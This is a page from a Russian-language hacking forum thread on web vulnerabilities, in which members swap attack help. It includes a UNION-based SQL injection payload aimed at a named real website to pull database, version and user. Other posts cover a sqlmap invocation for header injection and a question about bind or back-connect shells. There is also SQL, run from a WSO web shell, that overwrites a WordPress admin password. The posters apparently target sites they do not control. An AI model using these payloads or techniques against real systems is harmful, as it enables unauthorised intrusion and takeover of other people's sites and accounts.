HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #24141  
Старый 23.02.2015, 13:53
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Цитата:
Сообщение от MaxFast  
MaxFast said:
Код:
Code:
ukrcrewing.com.ua/agency ('union select 1,concat(database(),0x3a,version(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--')
Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц
 
Ответить с цитированием

  #24142  
Старый 23.02.2015, 14:00
5maks5
Guest
Сообщений: n/a
Провел на форуме:
168184

Репутация: 40
По умолчанию

Цитата:
Сообщение от EksTasy  
EksTasy said:
есть ли здесь уязвимость?
Это Opencart, нет ничего.
 
Ответить с цитированием

  #24143  
Старый 23.02.2015, 14:47
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц
waf на точку, у меня обойти не вышло. пробуйте подбирать таблицы перебором
 
Ответить с цитированием

  #24144  
Старый 23.02.2015, 15:06
huntercs16
Guest
Сообщений: n/a
Провел на форуме:
35200

Репутация: 6
По умолчанию

Парни,я понял что blind sql injection - это сначала запрос вида

select count(*) from pages where id=...

а потом

select * from pages where id=...

В случае если первый запрос возвращает 0 -происходит редирект.

Вопрос. Как часто происходит редирект в blind sql injection
 
Ответить с цитированием

  #24145  
Старый 24.02.2015, 21:46
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от huntercs16  
huntercs16 said:
Парни,я понял что blind sql injection - это сначала запрос вида
select count(*) from pages where id=...
а потом
select * from pages where id=...
В случае если первый запрос возвращает 0 -происходит редирект.
Вопрос. Как часто происходит редирект в blind sql injection
Ерунду какую-то написал. Твои запросы - это обычная union инъекция. Блайнд - это отсутствие вывода, через select ты ничего не выведешь, ты можешь только проверить истинность или ложность выражения. Учи матчасть.
 
Ответить с цитированием

  #24146  
Старый 25.02.2015, 11:10
Export
Новичок
Регистрация: 13.02.2010
Сообщений: 0
Провел на форуме:
3855

Репутация: 0
По умолчанию

Скажите: как мне заюзать бекконект или биндпорт, если shell_exec не работает, а следовательно Perl bind.pl не приводит к нужному результату.
 
Ответить с цитированием

  #24147  
Старый 26.02.2015, 03:37
preno
Guest
Сообщений: n/a
Провел на форуме:
55516

Репутация: 0
По умолчанию

Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?
 
Ответить с цитированием

  #24148  
Старый 26.02.2015, 04:32
lifescore
Guest
Сообщений: n/a
Провел на форуме:
213865

Репутация: 72
По умолчанию

Цитата:
Сообщение от preno  
preno said:
Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?
./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0" --cookie="%Query_Cookie%" -u 'http://url.com/path/?id=1' --level=5 risk=3 -p %Parametr%

Или

-r и путь к файлу с HTTP запросом

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]POST[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vuln[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1

Host
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com

User
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0

id
[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR
 
Ответить с цитированием

  #24149  
Старый 26.02.2015, 11:37
yeti2
Guest
Сообщений: n/a
Провел на форуме:
24060

Репутация: 0
По умолчанию

Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"
 
Ответить с цитированием

  #24150  
Старый 26.02.2015, 12:27
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от yeti2  
yeti2 said:
Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"
Сразу задавайте вопросы в соответвствующей теме.

Strilo4ka вчера Вам отвечал:

Цитата:
Сообщение от None  
Цитата:
Сообщение от yeti2  
yeti2 said:
как в wso shell'е заменить пароль в mysql wordpress базе. user_pass на свой
Код:
Code:
update `wp_users` set `user_pass`='$P$B7Ksq0R9XEPqj/ZD1/YOmG4TzToS24/' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1
только Вы немного темой ошиблись.
" if author else f"
Цитата:
Цитата:
Сообщение от yeti2  
yeti2 said:
как в wso shell'е заменить пароль в mysql wordpress базе. user_pass на свой
Код:
Code:
update `wp_users` set `user_pass`='$P$B7Ksq0R9XEPqj/ZD1/YOmG4TzToS24/' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1
только Вы немного темой ошиблись.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ